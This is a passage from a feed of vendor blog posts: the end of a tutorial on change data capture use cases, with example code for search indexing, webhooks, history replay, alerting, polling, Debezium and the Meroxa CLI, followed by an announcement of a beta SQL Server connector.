  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; before&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; after&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; op &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; payload&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// if read, create, or update operation, create or update the index&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;r&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;c&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;u&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;operation: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;op&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;, id: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;objectID &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id
      &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; index&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;saveObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;d&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;operation: d, id: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; index&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;deleteObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;error: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;JSON&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stringify&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;throw&lt;/span&gt; error
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
 
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;logStreamName
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every time this function is triggered, it will look at the data change (&lt;code class=&quot;language-text&quot;&gt;op&lt;/code&gt;) and perform the equivalent action in Algolia. For example, if a delete operation occurs in the database, we can perform a &lt;a href=&quot;https://www.algolia.com/doc/api-reference/api-methods/delete-objects/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;deleteObject&lt;/code&gt;&lt;/a&gt; in Algolia.&lt;/p&gt;
&lt;p&gt;Functions that respond to CDC events can be small and simple. But, CDC — along with event-based architectures — can simplify otherwise very complex architectures as well.&lt;/p&gt;
&lt;p&gt;For example, implementing webhooks as a feature within your application becomes a more straightforward problem with CDC. Webhooks allow users to trigger a &lt;code class=&quot;language-text&quot;&gt;POST&lt;/code&gt; request when certain events occur, typically data changes. For example, with &lt;a href=&quot;https://docs.github.com/en/developers/webhooks-and-events/webhooks/about-webhooks&quot;&gt;GitHub&lt;/a&gt;, you can trigger a cloud function when a pull request is merged. A merged pull request is an &lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt; operation to a data store, which means a CDC system can capture this event. Generally, most webhook events can be translated to the &lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations that a CDC system can capture.&lt;/p&gt;
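&lt;p&gt;To make that concrete, here is a minimal sketch of a webhook dispatcher driven by CDC events. The subscription list, table name, and URL are made up for illustration, and the delivery function simply records the payload where a real system would issue an HTTP POST with retries and signing:&lt;/p&gt;

```javascript
// Sketch: turning CDC operations into webhook deliveries.
// Subscriptions and the `deliver` transport are hypothetical.
const subscriptions = [
  { table: "pull_requests", ops: ["u"], url: "https://example.com/hooks/pr" },
];

const deliveries = [];
function deliver(url, body) {
  // Stand-in for an HTTP POST (fetch with method "POST", retries, signing).
  deliveries.push({ url, body });
}

function onChange(event) {
  const { after, source, op } = event.payload;
  for (const sub of subscriptions) {
    // Fire only for subscribed tables and operation types.
    if (sub.table === source.table) {
      if (sub.ops.includes(op)) {
        deliver(sub.url, { op, record: after });
      }
    }
  }
}

// A merged pull request arrives as an UPDATE to the underlying row:
onChange({ payload: { after: { id: 7, merged: true }, source: { table: "pull_requests" }, op: "u" } });
```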
&lt;h3&gt;History&lt;/h3&gt;
&lt;p&gt;In some cases, you may not want to act on the CDC event but only store the raw changes. Using CDC, a data pipeline can store all change events in a cloud bucket for long-term processing and analysis. Such a store is commonly referred to as a data lake.&lt;/p&gt;
&lt;p&gt;A data lake is a centralized store that allows you to store all your structured and unstructured data at any scale. Data lakes typically leverage cloud object bucket solutions like Amazon S3 or&lt;a href=&quot;https://try.digitalocean.com/cloud-storage&quot;&gt;Digital Ocean Spaces&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*aIQX7E2Zlt3A-0Qr6Pso9w.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;For example, once the data is in a data lake, SQL query engines like &lt;a href=&quot;https://aws.amazon.com/big-data/what-is-presto/&quot;&gt;Presto&lt;/a&gt; can run analytic queries against the change datasets.&lt;/p&gt;
&lt;p&gt;By storing the raw changes, you have not only the current state of the data but also &lt;em&gt;all&lt;/em&gt; of its previous states. That’s why CDC adds a ton of value to historical analysis.&lt;/p&gt;
&lt;p&gt;Having historical data allows you to support disaster recovery efforts and also allows you to answer retroactive questions about your data. For example, let’s say your team redefined how Monthly Active Users (MAU) are calculated. With the complete history of a user data set, one could perform the new MAU calculations based on any date in the past and compare the results to the current state.&lt;/p&gt;
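&lt;p&gt;As a small sketch of how such retroactive questions can be answered, the function below replays stored change events up to a cutoff timestamp to reconstruct a table&apos;s state as of that moment. The event shape and timestamps are illustrative, and events are assumed to be ordered by time:&lt;/p&gt;

```javascript
// Sketch: reconstructing a table's state as of a past date by replaying
// stored change events (the basis for retroactive metrics like a new MAU formula).
function stateAsOf(events, cutoffMs) {
  const rows = new Map();
  for (const e of events) {
    const { before, after, op, ts_ms } = e.payload;
    if (ts_ms > cutoffMs) break;       // events are assumed ordered by time
    if (op === "d") rows.delete(before.id);
    else rows.set(after.id, after);    // c, u, and r all upsert the row
  }
  return rows;
}

const history = [
  { payload: { after: { id: 1, active: true },  op: "c", ts_ms: 100 } },
  { payload: { after: { id: 1, active: false }, op: "u", ts_ms: 200 } },
];
console.log(stateAsOf(history, 150).get(1).active); // state between the two changes
```

&lt;p&gt;A new metric definition can then be evaluated against the reconstructed state for any past date and compared with the current numbers.&lt;/p&gt;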
&lt;p&gt;This rich history also has user-facing value. Audit logs and activity logs are features that display data changes to users.&lt;/p&gt;
&lt;p&gt;Capturing and storing change events offers a better architecture when these features are implemented. Like in Webhooks, audit logs and activity logs are rooted in operations that a CDC system can capture.&lt;/p&gt;
&lt;h3&gt;Alerting&lt;/h3&gt;
&lt;p&gt;The job of any alerting system is to notify a stakeholder of an event. For example, when you receive a new email notification, you are notified of an &lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt; operation to an email data store. Typically, most alerts are related to a change in a data store, which means that CDC is great for powering alerting systems.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*f0OCLLgyaU2yFJUUlaRfeA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;For example, let’s say you have an eCommerce store. After enabling CDC on a table of purchases, you could capture each change event and notify the team with a Slack alert whenever there is a new purchase.&lt;/p&gt;
&lt;p&gt;Just like audit or activity logs, notifications powered by CDC can not only provide information about the event that occurred but also provide details of the change itself:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Tom has updated the title from &quot;Meeting Notes&quot; to &quot;My New Meeting.&quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
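&lt;p&gt;A message like this can be derived directly from a change event, since the event carries both the before and after states. Here is a rough sketch; the field names and event shape are assumed for illustration:&lt;/p&gt;

```javascript
// Sketch: deriving a human-readable alert from a change event's
// before/after states, similar to the message shown above.
function describeUpdate(user, event) {
  const { before, after } = event.payload;
  const changes = [];
  for (const key of Object.keys(after)) {
    if (before[key] !== after[key]) {
      changes.push(`updated the ${key} from "${before[key]}" to "${after[key]}"`);
    }
  }
  return `${user} has ${changes.join(" and ")}.`;
}

const event = {
  payload: {
    before: { id: 9, title: "Meeting Notes" },
    after:  { id: 9, title: "My New Meeting" },
    op: "u",
  },
};
console.log(describeUpdate("Tom", event));
```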
&lt;p&gt;This alerting behavior also has internal value. From an infrastructure monitoring perspective, CDC events can provide insight into how users interact with your application and data. For example, you could see when and how users add, update, or delete information. This data can be sent to &lt;a href=&quot;https://prometheus.io/&quot;&gt;Prometheus&lt;/a&gt; for monitoring and alerting.&lt;/p&gt;
&lt;h3&gt;Getting Started with CDC&lt;/h3&gt;
&lt;p&gt;In &lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-one&quot;&gt;part one&lt;/a&gt;, we talked about the various ways CDC is commonly implemented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Polling&lt;/li&gt;
&lt;li&gt;Database Triggers&lt;/li&gt;
&lt;li&gt;Streaming Logs&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These can all be used to build the use cases we’ve discussed in this article. Best of all, since CDC focuses on the data, the process is programming language agnostic and can be integrated into most architectures.&lt;/p&gt;
&lt;h3&gt;Polling and Triggers&lt;/h3&gt;
&lt;p&gt;When using polling or database triggers, there is nothing extra to install. You can get started by writing the queries you poll with, or by leveraging your database’s triggers if they are supported.&lt;/p&gt;
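&lt;p&gt;As an illustration of the polling approach, the sketch below tracks a watermark and fetches rows changed since the last poll. An in-memory array stands in for a real table, and the SQL in the comment is only indicative:&lt;/p&gt;

```javascript
// Sketch of the polling approach: repeatedly select rows changed since the
// last watermark. A real implementation would run SQL along the lines of
//   SELECT * FROM orders WHERE updated_at > :lastSeen ORDER BY updated_at
// against the database; here an in-memory array stands in for the table.
const table = [
  { id: 1, status: "paid",    updated_at: 100 },
  { id: 2, status: "shipped", updated_at: 250 },
];

let lastSeen = 0;
function pollChanges() {
  const changed = table.filter((row) => row.updated_at > lastSeen);
  if (changed.length > 0) {
    lastSeen = Math.max(...changed.map((r) => r.updated_at)); // advance the watermark
  }
  return changed;
}

console.log(pollChanges().length); // first poll sees all existing rows
console.log(pollChanges().length); // nothing new until rows change again
```

&lt;p&gt;A known limitation of this watermark style of polling is that hard deletes never appear in the results, since a removed row no longer matches the query.&lt;/p&gt;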
&lt;h3&gt;Streaming Logs&lt;/h3&gt;
&lt;p&gt;Databases use streaming replication logs for backup and recovery, which means that most databases provide some CDC behavior out of the box. How easy it is to tap into these events depends on the data store itself. The best place to get started is by digging into your database’s replication features. Here are some replication log resources for some of the most popular databases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.postgresql.org/docs/9.0/wal-intro.html&quot;&gt;PostgreSQL’s Write-Ahead Logs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://dev.mysql.com/doc/refman/8.0/en/binary-log.html&quot;&gt;MySQL’s Binary Log&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.mongodb.com/manual/core/replica-set-oplog/&quot;&gt;MongoDB’s Oplog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cockroachlabs.com/docs/v20.1/change-data-capture.html&quot;&gt;CockroachDB&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;How you get started with streaming logs is tightly coupled to the database in question. In future articles, I’ll explore what this looks like for each of these databases.&lt;/p&gt;
&lt;p&gt;Implementing any of these directly does take some time, planning, and effort. If you’re trying to get started with CDC, the lowest barrier to entry is adopting a CDC tool that knows how to communicate and capture changes from the data stores you use.&lt;/p&gt;
&lt;h3&gt;Change Data Capture Tools&lt;/h3&gt;
&lt;p&gt;Here are some great tools for you to evaluate:&lt;/p&gt;
&lt;h3&gt;Debezium&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://debezium.io/&quot;&gt;Debezium&lt;/a&gt; is by far the most popular CDC tool. It’s well-maintained, open source, and built on top of &lt;a href=&quot;https://kafka.apache.org/&quot;&gt;Apache Kafka&lt;/a&gt;. It supports &lt;a href=&quot;https://debezium.io/documentation/reference/1.6/connectors/mongodb.html&quot;&gt;MongoDB&lt;/a&gt;, &lt;a href=&quot;https://debezium.io/documentation/reference/1.6/connectors/mysql.html&quot;&gt;MySQL&lt;/a&gt;, &lt;a href=&quot;https://debezium.io/documentation/reference/1.6/connectors/postgresql.html&quot;&gt;PostgreSQL&lt;/a&gt;, and more databases out of the box.&lt;/p&gt;
&lt;p&gt;At a high level, Debezium hooks into the replication logs of the database and emits the change events into Kafka. You can even run &lt;a href=&quot;https://debezium.io/documentation/reference/1.6/operations/debezium-server.html&quot;&gt;Debezium standalone&lt;/a&gt; without Kafka.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*0rFy1SLmnB2Qnb7N1dhDaA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;What’s really nice is that Debezium is all configuration-based. After installing and configuring Debezium, you can configure connections to your datastore using a JSON-based configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fulfillment-connector&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;config&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;connector.class&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;io.debezium.connector.postgresql.PostgresConnector&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.hostname&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;192.168.99.100&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.port&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;5432&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.user&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.password&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.dbname&quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;database.server.name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fulfillment&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;table.include.list&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;public.inventory&quot;&lt;/span&gt; 
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once connected, Debezium will perform an initial snapshot of your data and emit change events to a Kafka topic. Then, services can &lt;a href=&quot;https://kafka.apache.org/documentation/#gettingStarted&quot;&gt;consume the topics&lt;/a&gt; and act on them.&lt;/p&gt;
&lt;p&gt;Here are some great places to get started with Debezium:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://debezium.io/documentation/online-resources/&quot;&gt;Debezium resources on the web&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://debezium.io/documentation/reference/1.6/tutorial.html&quot;&gt;Debezium Tutorial&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Meroxa&lt;/h3&gt;
&lt;p&gt;Meroxa is a real-time data orchestration platform that gives you real-time infrastructure. Meroxa removes the time and overhead associated with configuring and managing brokers, connectors, transforms, functions, and streaming infrastructure. All you have to do is add your resources and construct your pipelines. Meroxa supports &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/mongodb&quot;&gt;MongoDB&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/sqlserver/setup&quot;&gt;Microsoft SQL Server&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;more&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;CDC pipelines can be built in a visual dashboard or using the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;# Add Resource
$ meroxa resource add my-postgres --type postgres -u postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB

# Add Webhook
$ meroxa resource add my-url --type url -u $CUSTOM_HTTP_URL

# Create CDC Pipeline
$ meroxa connect --from my-postgres --input $TABLE_NAME --to my-url&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I can’t wait to see what you build. 🚀&lt;/p&gt;
&lt;p&gt;If you have any questions or feedback, I’d love to hear them. You can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Discuss with me in our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;&lt;strong&gt;Discord&lt;/strong&gt;&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Reach out to me on &lt;a href=&quot;https://www.notion.so/Stream-Your-Database-Changes-with-Change-Data-Capture-Part-Two-c5e1f0d9b19d4f5597fcefcb67c74fb1&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Introducing Microsoft SQL Server Connector Beta]]></title><description><![CDATA[Microsoft SQL Server is a powerful, widely used relational database management system. Today, we’re releasing a beta version of our Microsoft SQL Server connector.]]></description><link>https://meroxa.com/blog/introducing-microsoft-sql-server-connector-beta</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-microsoft-sql-server-connector-beta</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Thu, 19 Aug 2021 15:33:00 GMT</pubDate><content:encoded>&lt;h3&gt;Real-time SQL Server Change Data Capture (CDC)&lt;/h3&gt;
&lt;p&gt;Microsoft SQL Server is a powerful, widely used relational database management system. Today, we’re releasing a public beta version of our Microsoft SQL Server connector as a source for real-time data streams.&lt;/p&gt;
&lt;p&gt;As a source, you can build pipelines that act on changes from SQL Server. For example, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Extract, transform, and load (ETL) data into a data warehouse.&lt;/li&gt;
&lt;li&gt;Replicate and sync data to other data stores in real time.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With Meroxa, it’s all streaming and real-time, and your pipelines will be up and running in minutes, not months.&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;To begin streaming data from SQL Server, perform the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;http://dashboard.meroxa.io/&quot;&gt;Create an Account&lt;/a&gt; — by using the &lt;a href=&quot;http://dashboard.meroxa.io/&quot;&gt;dashboard&lt;/a&gt; or the CLI.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/sqlserver/setup&quot;&gt;Setup&lt;/a&gt; — configure your Microsoft SQL Server instance and acquire the credentials needed to talk to Meroxa.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview#create-a-resource&quot;&gt;Add Resource&lt;/a&gt; — use the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or the &lt;a href=&quot;https://docs.meroxa.com/cli/cmd/meroxa-resources-create&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt;&lt;/a&gt; command to add it to your Meroxa Resource Catalog.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;SQL Server Source Connector&lt;/h3&gt;
&lt;p&gt;As a source, you can capture changes from SQL Server and send them to &lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-redshift&quot;&gt;Amazon Redshift&lt;/a&gt;, Webhooks, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;Amazon S3&lt;/a&gt;, or &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;any other destination&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The SQL Server source is a CDC connector that leverages the &lt;a href=&quot;https://docs.microsoft.com/en-us/sql/relational-databases/track-changes/about-change-data-capture-sql-server?view=sql-server-ver15&quot;&gt;SQL Server transaction log&lt;/a&gt;, which contains a record of every change event. The connector first performs an initial snapshot of the data. Then, it streams every &lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operation and pushes the events into a Meroxa stream.&lt;/p&gt;
&lt;p&gt;This connector will emit data records in the following format:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*3UPlW3iDFuihoKqr2p6nOw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;To create a source, you can use the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or the &lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt; command to create a new connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;meroxa resource create mysqlserver \
  --type sqlserver \
  --url &quot;sqlserver://$MSSQL_USER:$MSSQL_PASS@$MSSQL_URL:$MSSQL_PORT/$MSSQL_DB&quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For more, see the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/sqlserver/setup&quot;&gt;Microsoft SQL Server documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I can’t wait to see what you build 🚀&lt;/p&gt;
